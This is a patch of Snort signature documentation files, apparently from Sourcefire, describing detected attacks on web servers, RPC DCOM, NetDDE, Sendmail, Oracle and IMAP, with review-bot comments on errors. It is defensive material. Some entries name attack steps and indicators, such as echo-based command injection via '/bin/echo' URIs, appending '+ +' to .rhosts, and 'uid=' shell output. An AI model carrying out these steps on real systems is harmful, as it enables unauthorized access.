+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
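Review bot: "a Web server" in the first Detailed Information line (+running a Web server or a vulnerable application on a web server.) is capitalised inconsistently with "web server" in the rest of the file; use the lowercase form throughout. The Affected Systems entry is tab-indented while the rest of the file is flush left. Additional References is empty; state that no reference is available rather than leaving the section blank.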
--- /dev/null
+++ b/doc/signatures/100000789.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000789
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "FreeWebshop" application running on a webserver. Access to the file "details.php" with SQL commands being passed as the "prod" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "prod" parameter in the "details.php" script used by the "FreeWebshop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using FreeWebshop
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
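Review bot: Corrective Action only says to apply vendor patches, while Attack Scenarios attributes the issue to user input that is "not correctly sanitized or checked before passing that input to the database"; the corrective section should name that cause (validate the "prod" parameter and use parameterised queries) so the two sections agree. The third Detailed Information paragraph (+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. ...) is credential-validation boilerplate unrelated to SQL injection and also contains the "ona" typo; drop it. The second paragraph is a comma splice ("... compromise the database backend for the application, the attacker may also be able ..."); split it into two sentences.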
--- /dev/null
+++ b/doc/signatures/1027.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1027
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
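Review bot: the Impact line (+Information gathering possible administrator access.) is missing punctuation between its two clauses; "Information gathering, possible administrator access." or "Information gathering and possible administrator access." The "Sid: 1027" line puts the value inline and is followed by two blank lines, whereas the other files in this patch put the value on its own line under "Sid:"; align it with the rest. Additional References is blank; say explicitly that none is available.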
--- /dev/null
+++ b/doc/signatures/586.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+586
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) selection_svc is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port selection_svc is using.  Attackers can also learn what versions of the selection_svc protocol are accepted by selection_svc.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as selection_svc run.  The selection_svc RPC service is used by SunView, an old windowing system from Sun.  A vulnerability exists in selection_svc that allows a remote user to read files that are readable by SunView. 
+
+--
+Affected Systems:
+Sun SunOS 3.5
+Sun SunOS 4.0
+Sun SunOS 4.0.1
+Sun SunOS 4.0.2
+Sun SunOS 4.0.3
+Sun SunOS 4.1
+Sun SunOS 4.1.1
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where selection_svc runs.  This may be a precursor to accessing selection_svc.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access selection_svc, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for selection_svc, not probes of the selection_svc service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the selection_svc service itself. An attacker may attempt to go directly to the selection_svc port without querying the portmapper service which, would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/8
+
+CERT
+http://www.cert.org/advisories/CA-1990-05.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS25
+
+
+--
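Review bot: the False Negatives sentence (+... directly to the selection_svc port without querying the portmapper service which, would not trigger the rule.) has a misplaced comma; it should read "the portmapper service, which would not trigger the rule". The "Arachnids " reference heading carries trailing whitespace, and the file mixes single and double spaces after full stops; normalise to one.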
--- /dev/null
+++ b/doc/signatures/1334.txt
@@ -0,0 +1,80 @@
+Rule:
+
+--
+Sid:
+1334
+
+--
+Summary:
+Attempted echo command access via web
+
+--
+Impact:
+Attempt to gain system environment information or an attempt to post
+information on the host using the echo command.
+
+--
+Detailed Information:
+This rule generates an event when a UNIX "echo" command is used over a
+plain-text (unencrypted) connection on one of the specified web ports to
+the target web server. The "echo" command may be used to modify the
+content of arbitrary files by means of shell output redirection.
+
+The rule looks for the "echo" command in the client to web server
+network traffic and does not indicate whether the command was actually
+successful. The presence of the "echo" command web traffic indicates
+that an attacker attempted to trick the web server into executing system
+commands in non-interactive mode i.e. without a valid shell session. 
+
+Alternatively this rule may generate an event in an unencrypted HTTP
+tunneling connection to the server or a shell connection via another
+exploit against the web server.
+
+This may also be an attempt to gain intelligence about the environment
+variables on a webserver. echo is a built-in shell command that will
+return information about the system's environment variables. This
+information is valuable to an attacker who can use it to plan further
+attacks based on the information returned.
+
+--
+Attack Scenarios:
+1. The attacker can make a standard HTTP request that contains
+'/bin/echo' in the URI which can then return sensitive information on
+system environment variables present on the host.  This command may also
+be requested on a command line should the attacker gain access to the machine.
+
+2. An attacker uses a "echo" command via a web server connection to add
+"+ +" to a corresponding ".rhosts" file which controls access
+permissions to the system via r-commands
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+man echo
+
+--
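Review bot: the Detailed Information claim that "echo is a built-in shell command that will return information about the system's environment variables" overstates what echo does; it prints its arguments, and environment values only appear when the shell expands them, so the disclosure described in Attack Scenario 1 depends on the attacker already controlling a shell command line. Reword so the statement is accurate. Corrective Action (+outside of it's designated web root or cgi-bin.) should read "outside of their designated web root" to agree with the plural "Webservers" and drop the stray apostrophe. Attack Scenario 2 should say "an "echo" command", and "non-interactive mode i.e. without" needs a comma before "i.e.". This file also has no Affected Systems section at all, unlike the other signature docs in this patch; add one, even if it only says all web servers.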
--- /dev/null
+++ b/doc/signatures/1859.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1859
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
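Review bot: the Affected Systems section is empty, so the doc gives no indication of which server or application this rule is aimed at; either list them or state that the rule is generic. The Detailed Information text is identical to that of 1212.txt and 1301.txt elsewhere in this patch, so nothing in the three files says what distinguishes the rules; at least the Summary should name the matched request. "running ona web server" in Detailed Information should read "on a web server". Additional References is blank.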
--- /dev/null
+++ b/doc/signatures/2965.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2965
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
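Review bot: the Impact line (+Serious. Execution of arbitrary code with system level privileges) and the first Corrective Action line (+Apply the appropriate vendor supplied patches) both lack a terminating full stop. The Affected Systems entry is tab-indented while the rest of the file is flush left.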
--- /dev/null
+++ b/doc/signatures/2443.txt
@@ -0,0 +1,82 @@
+Rule:  
+
+--
+Sid:
+2443
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in multiple versions of Internet Security Systems software.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible leading to unauthorized 
+access to the affected host. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the way that multiple ISS products parse ICQ
+messages. This can lead to execution of arbitrary code on hosts using
+the affected products.
+
+Due to insufficient bounds checking when ISS products parse protocol
+fields in ICQ SRV_META_USER data, a buffer overflow condition can be
+exploited to give an attacker the opportunity to execute arbitrary code
+and gain unauthorized administrative access to the host.
+
+It is possible that this condition can be exploited without the need for
+an established and valid ICQ session. The attacker could create packets
+originating from a host on port 4000 and send specially crafted data to 
+exploit the condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 22.11 and prior
+	RealSecure Server Sensor 7.0 XPU 22.11 and prior
+	RealSecure Server Sensor 6.5 for Windows SR 3.10 and prior
+	Proventia A Series XPU 22.11 and prior
+	Proventia G Series XPU 22.11 and prior
+	Proventia M Series XPU 1.9 and prior
+	RealSecure Desktop 7.0 ebl and prior
+	RealSecure Desktop 3.6 ecf and prior
+	RealSecure Guard 3.6 ecf and prior
+	RealSecure Sentry 3.6 ecf and prior
+	BlackICE Agent for Server 3.6 ecf and prior
+	BlackICE PC Protection 3.6 ccf and prior
+	BlackICE Server Protection 3.6 ccf and prior
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
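Review bot: Impact lists "Denial of Service (DoS)" but Detailed Information describes only the code-execution outcome of the SRV_META_USER overflow; either describe the DoS outcome there or drop it from Impact. The Affected Systems list uses "3.6 ecf" for some products and "3.6 ccf" for the BlackICE entries; worth confirming both suffixes are intended. Additional References is empty although the text describes a known vendor vulnerability; if the vendor advisory is known it belongs here, otherwise state that none is listed. "Rule:  " carries trailing whitespace.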
--- /dev/null
+++ b/doc/signatures/3254.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3254
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
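Review bot: Attack Scenarios (+An attacker may make a request for a file with an overly long filename via a network share.) does not match Detailed Information, which describes a malformed RPC request to DCOM causing a buffer overflow; the scenario looks pasted from a different signature and should describe the malformed RPC request instead. Every line of this file is identical to 3191.txt later in this patch, so neither document says what its particular rule matches; the Summary should state the distinguishing condition. "Expoit code exists." is a typo for "Exploit". Additional References is empty for a well-known vendor vulnerability.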
--- /dev/null
+++ b/doc/signatures/1212.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1212
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running on a web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Attrition:
+http://www.attrition.org/security/advisory/misc/ecom-990420
+
+--
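Review bot: the Affected Systems section is empty; given the Attrition advisory cited under Additional References, the affected application should be nameable here. Apart from that reference, the text duplicates 1859.txt and 1301.txt in this patch word for word, so the Summary should say what this rule in particular matches.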
--- /dev/null
+++ b/doc/signatures/1688.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1688
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
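Review bot: the sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell ..." refers to a connection not introduced by the preceding paragraphs and describes shell access rather than an Oracle client session; it reads as copied from the shell-command signature docs and should be replaced with a statement about the Oracle session carrying the command. Attack Scenarios (+Simple. These are Oracle database commands.) is an ease-of-attack statement, not a scenario; describe who issues the command and how. Corrective Action's second line needs a comma after "legitimate session" and a full stop at the end. The variable is written "$ORACLE_PORTS" in Detailed Information and "ORACLE_PORTS" in False Negatives; use one form. The blank lines inserted after each "--" separator differ from the layout of the other files in this patch.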
--- /dev/null
+++ b/doc/signatures/3191.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3191
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
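Review bot: this file is a verbatim copy of 3254.txt earlier in this patch, including the Attack Scenarios paragraph about an overly long filename on a network share that contradicts the RPC DCOM overflow described in Detailed Information, and the "Expoit code exists." typo. Fix both here as well, and give this Summary the condition that distinguishes sid 3191 from sid 3254.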
--- /dev/null
+++ b/doc/signatures/1883.txt
@@ -0,0 +1,65 @@
+Rule:
+
+
+--
+Sid:
+
+1883
+
+-- 
+Summary: 
+This rule has been placed in deleted.rules
+
+-- 
+Impact: 
+
+attacker might have gained an ability to execute commands remotely on the system.
+
+--
+Detailed Information:
+
+This signature triggers when a UNIX "id" command is used to confirm
+the user name of the currently logged in user over any unencrypted
+connection. Such connection can be either a legitimate telnet
+connection or a result of spawning a shell on FTP, POP3, SMTP or other
+port as a consequence of network exploit. The string "uid=" and
+"(nobody)" is an output of an "id" command indicating that the user
+has "nobody" account privileges, typically used by the web server
+process.  Seeing such a response indicates that some user connected
+over the network to a target web server and likely exploited the web
+server to launch a shell.
+
+--
+Attack Scenarios: 
+
+a buffer overflow exploit against the WWW server results in "/bin/sh" being executed. An automated script performing an attack, checks for the success of the exploit via an "id" command.
+
+-- 
+Ease of Attack: 
+
+this post-attack behavior can accompany different attacks
+
+-- 
+False Positives: 
+
+the signature will trigger if a legitimate system administrator executes the "id" command over the telnet connection which uses one of the web ports, as defined in snort.conf
+
+--
+False Negatives: 
+
+not known
+
+-- 
+Corrective Action: 
+
+investigate the server for signs of compromise, run the integrity checking software, look for other IDS alerts involving the same IP addresses.
+
+--
+Contributors: 
+
+Anton Chuvakin <anton@chuvakin.org>
+
+-- 
+Additional References:
+
+--
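Review bot: the Summary (+This rule has been placed in deleted.rules) states the rule's status instead of what the rule matches; keep a one-line summary of the "id" output match and note the deleted.rules status separately, since readers arriving from an old alert still need the description. Several sections start in lowercase ("attacker might have gained", "a buffer overflow exploit", "this post-attack behavior", "the signature will trigger", "not known", "investigate the server"); capitalise them. In Detailed Information, "Such connection" should read "Such a connection", and "The string "uid=" and "(nobody)" is an output" should read "The strings ... are output". The Sid value is separated from its label by a blank line, unlike the other files.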
--- /dev/null
+++ b/doc/signatures/961.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+961
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	Systems using Microsoft FrontPage Server Extensions 98
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q188/2/57.ASP&NoWebContent=1&NoWebContent=1
+
+--
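Review bot: the Microsoft reference URL carries the query parameter "&NoWebContent=1" twice; drop the duplicate. The Summary speaks of FrontPage Server Extensions generally while Affected Systems names only the 98 release; if the rule is specific to that release, say so in the Summary.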
--- /dev/null
+++ b/doc/signatures/2262.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2262
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-12.html
+
+--
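Review bot: Affected Systems (+All systems using Sendmail.) contradicts Detailed Information, which limits the prescan() issue to Sendmail prior to version 8.12.9; the affected range should match. "non-affected verison" in Corrective Action is a typo for "version". In Attack Scenarios, "process code of their choosing" should read "execute code of their choosing". "Rule:  " carries trailing whitespace.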
--- /dev/null
+++ b/doc/signatures/1301.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1301
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
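Review bot: the Affected Systems section is empty, so the document never says which web servers or applications sid 1301 covers; either list them or state that the rule is generic. Detailed Information has "running ona web server", which should be "running on a web server", and Additional References is empty even though Ease of Attack states "Exploits exist", which deserves at least one pointer.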
--- /dev/null
+++ b/doc/signatures/2106.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2106
+
+--
+Summary:
+This event is generated when a remote user sends an IMAP LSUB command
+with invalid data to port 143 on an internal server. This may indicate
+an attempt to exploit a buffer overflow vulnerability in the IMAP LSUB
+command. This vulnerability may affect other IMAP implementations.
+
+--
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When a large amount of data is sent to a vulnerable IMAP server in the
+LSUB command, a buffer overflow condition may occur. This can allow the
+attacker to access the shell, where arbitrary code can be executed. Note
+that this exploit can only be attempted by a user with a valid IMAP account.
+
+--
